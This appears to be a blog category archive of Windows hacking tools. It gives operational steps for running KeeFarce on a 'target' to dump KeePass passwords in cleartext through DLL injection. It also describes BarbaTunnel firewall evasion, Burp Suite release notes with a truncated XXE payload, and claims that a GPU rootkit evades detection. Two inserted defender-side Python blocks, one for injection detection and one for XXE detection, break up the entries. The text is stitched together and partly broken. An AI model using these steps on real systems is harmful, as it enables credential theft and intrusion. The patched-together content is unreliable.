Category Archives: Windows

KeeFarce – Extracts Passwords From A Keepass 2.X Database From Memory

Download
KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and URLs, is dumped into a CSV file in %AppData%.

General Design

KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the .NET runtime within the appropriate app domain, which subsequently executes KeeFarceDLL.dll (the main C# payload).

The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass process's heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.
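A defender-side illustration, added here and not part of the KeeFarce project: the path described above (a foreign process executing code inside KeePass.exe, then KeePass loading a DLL from outside its install directory) leaves traces that endpoint telemetry can flag. The code assumes Sysmon-style CreateRemoteThread (Event ID 8) and ImageLoaded (Event ID 7) records serialised as JSON lines; the sample events and the KeePass install paths are constructed assumptions.

```python
"""Flag the traces that DLL injection into KeePass leaves in endpoint
telemetry. Sample events are constructed for this example, modelled on
Sysmon Event ID 8 (CreateRemoteThread) and 7 (ImageLoaded) fields."""
import json
from pathlib import PureWindowsPath

# Assumed default install directories (lower-cased for comparison).
KEEPASS_DIRS = {
    r"c:\program files\keepass password safe 2",
    r"c:\program files (x86)\keepass password safe 2",
}

# Constructed sample telemetry: one injection sequence plus benign noise.
SAMPLE_EVENTS = r"""
{"EventID": 8, "SourceImage": "C:\\Users\\bob\\Downloads\\KeeFarce.exe", "TargetImage": "C:\\Program Files (x86)\\KeePass Password Safe 2\\KeePass.exe", "StartFunction": "LoadLibraryA"}
{"EventID": 7, "Image": "C:\\Program Files (x86)\\KeePass Password Safe 2\\KeePass.exe", "ImageLoaded": "C:\\Users\\bob\\Downloads\\BootstrapDLL.dll", "Signed": "false"}
{"EventID": 7, "Image": "C:\\Program Files (x86)\\KeePass Password Safe 2\\KeePass.exe", "ImageLoaded": "C:\\Windows\\System32\\kernel32.dll", "Signed": "true"}
{"EventID": 7, "Image": "C:\\Windows\\explorer.exe", "ImageLoaded": "C:\\Users\\bob\\Downloads\\Unsigned.dll", "Signed": "false"}
"""


def is_keepass(path: str) -> bool:
    return PureWindowsPath(path).name.lower() == "keepass.exe"


def in_keepass_dir(path: str) -> bool:
    return str(PureWindowsPath(path).parent).lower() in KEEPASS_DIRS


def detect_keepass_injection(jsonl: str) -> list:
    """Return one alert string per suspicious event.

    Rule 1: a remote thread created in KeePass.exe by any other image.
    Rule 2: KeePass.exe loading an unsigned module from outside its
            install directory (the bootstrap/payload DLLs in the text)."""
    alerts = []
    for raw in jsonl.splitlines():
        if not raw.strip():
            continue
        ev = json.loads(raw)
        if ev["EventID"] == 8:
            if is_keepass(ev["TargetImage"]) and not is_keepass(ev["SourceImage"]):
                alerts.append(f"remote thread into KeePass from {ev['SourceImage']}")
        elif ev["EventID"] == 7 and is_keepass(ev["Image"]):
            loaded = ev["ImageLoaded"]
            if ev.get("Signed", "false").lower() != "true" and not in_keepass_dir(loaded):
                alerts.append(f"KeePass loaded unsigned module {loaded}")
    return alerts


if __name__ == "__main__":
    for alert in detect_keepass_injection(SAMPLE_EVENTS):
        print("ALERT:", alert)
```

Real deployments should also cover the KeeFarce output file appearing under %AppData% and any legitimate KeePass plugin directory the site permits.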

Prebuilt Packages

An appropriate build of KeeFarce needs to be used depending on the KeePass target’s architecture (32 bit or 64 bit). Archives and their shasums can be found under the ‘prebuilt’ directory.
Executing

In order to execute on the target host, the following files need to be in the same folder:

BootstrapDLL.dll
KeeFarce.exe
KeeFarceDLL.dll
Microsoft.Diagnostic.Runtime.dll

Copy these files across to the target and execute KeeFarce.exe.

Building

Open up KeeFarce.sln with Visual Studio (note: development was done on Visual Studio 2015) and hit ‘build’. The results will be spat out into dist/$architecture. You’ll have to copy the KeeFarceDLL.dll and Microsoft.Diagnostic.Runtime.dll files into that folder before executing, as these are architecture-independent.
Compatibility

KeeFarce has been tested on:

KeePass 2.28, 2.29 and 2.30 – running on Windows 8.1 – both 32 and 64 bit.

This should also work on older Windows machines (Windows 7 with a recent service pack). If you’re targeting something other than the above, then testing in a lab environment beforehand is recommended.
Acknowledgements

Sharp Needle by Chad Zawistowski was used for the DLL injection tech.
Code by Alois Kraus was used to get the pointer to object C# voodoo working.

License

BSD License, see LICENSE file


firewall evasion – BarbaTunnel

download

BarbaTunnel is software that helps you bypass firewalls and internet censorship. It is a peer-to-peer tunnel, so you need a server outside the firewalled network. In most cases you can simply use a VPN or a proxy, but when you use a VPN the firewall knows that you are using one: it does not know what you are doing, but VPNs and some other proxies do not hide their fingerprint. BarbaTunnel is a layer on your network that tries to make existing VPN packets look like ordinary traffic. BarbaTunnel does not work alone; it works together with a VPN. So if you have a VPN and have no issues with it, you do not need BarbaTunnel, but if the firewall blocks your VPN connection or throttles its speed, BarbaTunnel may be helpful.

Attention: BarbaTunnel is not a standalone tunnel; you should run a tunnel application or use a standard VPN connection after starting BarbaTunnel.

(Screenshot: BarbaTunnel Monitor)

BarbaTunnel requires .NET Framework 4.5 for “Barba Monitor” and “Barba Service”, but BarbaTunnel.exe itself does not need the .NET Framework, so you can run it manually on both the client and the server side without it.
Configure Server

Login to your Windows Server.
Download BarbaTunnel and extract it.
Open “barbatunnel.ini” in BarbaTunnel folder and set “ServerMode=1”
Go to the BarbaTunnel folder, open the “config\servername” folder, then open the “HTTP-Retunnel.ini” file.
Set “ServerAddress” to your server's IP address (required).
Run “Install.vbs”
Run “Run.Vbs”
The server is already configured for specific ports; for custom configuration see “config.ini”.
Configure Client Machine

Login to your Windows Client.
Download BarbaTunnel and extract it.
Copy the “config” folder and the config files you already created on the server machine.
Run “Install.vbs”
Run “Run.Vbs”
Try to establish a VPN connection to your server.
Remarks

It is recommended to rename the “servername” folder to your server name or server IP (optional).
Ensure that BarbaServer and BarbaClient have the same major version, such as 1.0 and 1.1.
Make sure the server config file and the client config file are the same.
Make sure the enterprise firewall does not block the tunnel ports.
Make sure your local firewall, such as Windows Firewall, does not block the tunnel ports or BarbaTunnel.
Make sure you have a way to reboot your system if you lose the connection to your server; if you have limited access to reboot the server, create a timer job to restart it before running BarbaTunnel.


Pentest tools – Burp Suite Professional v1.6.23

Burp Suite contains the following key components:
An intercepting Proxy, which lets you inspect and modify traffic between your browser and the target application.
An application-aware Spider, for crawling content and functionality.
An advanced web application Scanner, for automating the detection of numerous types of vulnerability.
An Intruder tool, for performing powerful customized attacks to find and exploit unusual vulnerabilities.
A Repeater tool, for manipulating and resending individual requests.
A Sequencer tool, for testing the randomness of session tokens.
The ability to save your work and resume working later.
Extensibility, allowing you to easily write your own plugins, to perform complex and highly customized tasks within Burp.

Burp is easy to use and intuitive, allowing new users to begin working right away. Burp is also highly configurable, and contains numerous powerful features to assist the most experienced testers with their work.
Release Notes

v1.6.23

This release adds a new scan check for external service interaction and out-of-band resource load via injected XML doctype tags containing parameter entities. Burp now sends payloads like:

%f5a30; ]>

and reports an appropriate issue based on any observed interactions (DNS or HTTP) that reach the Burp Collaborator server.
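A defender-side counterpart, added here and not taken from Burp: the class of probe described above, a DOCTYPE declaring a parameter entity with an external SYSTEM identifier, is recognisable before any parser resolves it. This Python example uses the standard library's expat bindings (which do not fetch external entities unless told to) to record what a request body's DTD declares, and pairs that with a hardened parse that rejects any DOCTYPE. The sample bodies are constructed and the probe host is a placeholder.

```python
"""Recognise DTD features that enable out-of-band interaction (external
and parameter entities) in an XML request body, and parse safely without
them. Sample bodies are constructed; the probe host is a placeholder."""
import xml.etree.ElementTree as ET
from xml.parsers import expat

# Constructed probe in the style the release notes describe: a parameter
# entity pointing at an external host, referenced inside the DOCTYPE.
OOB_PROBE = ('<?xml version="1.0"?>'
             '<!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://probe.example/x"> %xxe; ]>'
             '<foo>bar</foo>')
BENIGN = '<?xml version="1.0"?><order><id>1</id></order>'


def find_dtd_risks(body: str) -> dict:
    """Parse with expat and record DOCTYPE declarations. Expat never
    resolves external entities unless a handler is installed, so this is
    safe to run on untrusted input. Truncated probes are handled too:
    whatever was declared before a parse error is still reported."""
    findings = {"doctype": None, "external_entities": [],
                "parameter_entities": []}

    def on_doctype(name, sysid, pubid, has_internal_subset):
        findings["doctype"] = {"name": name, "system_id": sysid}

    def on_entity(name, is_param, value, base, sysid, pubid, notation):
        if is_param:
            findings["parameter_entities"].append(name)
        if sysid is not None:            # external entity (SYSTEM/PUBLIC)
            findings["external_entities"].append((name, sysid))

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(body, True)
    except expat.ExpatError:
        pass  # malformed probe: keep what was declared before the error
    findings["risky"] = bool(findings["external_entities"]
                             or findings["parameter_entities"]
                             or (findings["doctype"] or {}).get("system_id"))
    return findings


def parse_without_dtd(body: str) -> ET.Element:
    """Hardened parse: refuse any DOCTYPE at all, then parse the body."""
    if find_dtd_risks(body)["doctype"] is not None:
        raise ValueError("XML bodies with a DOCTYPE are not accepted")
    return ET.fromstring(body)
```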

The release also fixes some issues:

Some bugs affecting the saving and restoring of Burp state files.
A bug in the Collaborator server where the auto-generated self-signed certificate does not use a wildcard prefix in the CN. This issue only affects private Collaborator server deployments where a custom SSL certificate has not been configured.


windows – jellyfish gpu r.a.t. (rootkit)

download
Developers of team Jellyfish have posted a PoC of a portable-executable GPU remote access tool. They already posted a Linux version earlier this week.

Tapping an infected computer’s GPU allows malware to run without the usual software hooks or modifications malware makes in the operating system kernel. Those modifications can be dead giveaways that a system is infected.

Advantages of GPU-stored rootkits:

  • No GPU malware analysis tools available on the web
  • Can snoop on CPU host memory via DMA
  • GPU can be used for fast/swift mathematical calculations like xor’ing or parsing
  • Stubs
  • Malicious memory may be retained across warm reboots. (Did more conductive research on the theory of malicious memory still being in the GPU after shutdown)

It is just a matter of time until a version emerges that runs on graphics processors integrated into CPUs.


windows – net tools 5.0.70

download

Description

Net Tools is a comprehensive set of host monitoring, network scanning, security and administration tools and much more, a real Swiss army knife. The tools range from IP port scanners to a Google PageRank calculator.

Installation

Extract the zip file, right-click setup.exe and go to Properties. Change the compatibility mode to Windows XP (Service Pack 3) and enable Run as Administrator:
(Screenshot: nettools setup.exe properties)

After this, just start setup.exe and click Next a few times.

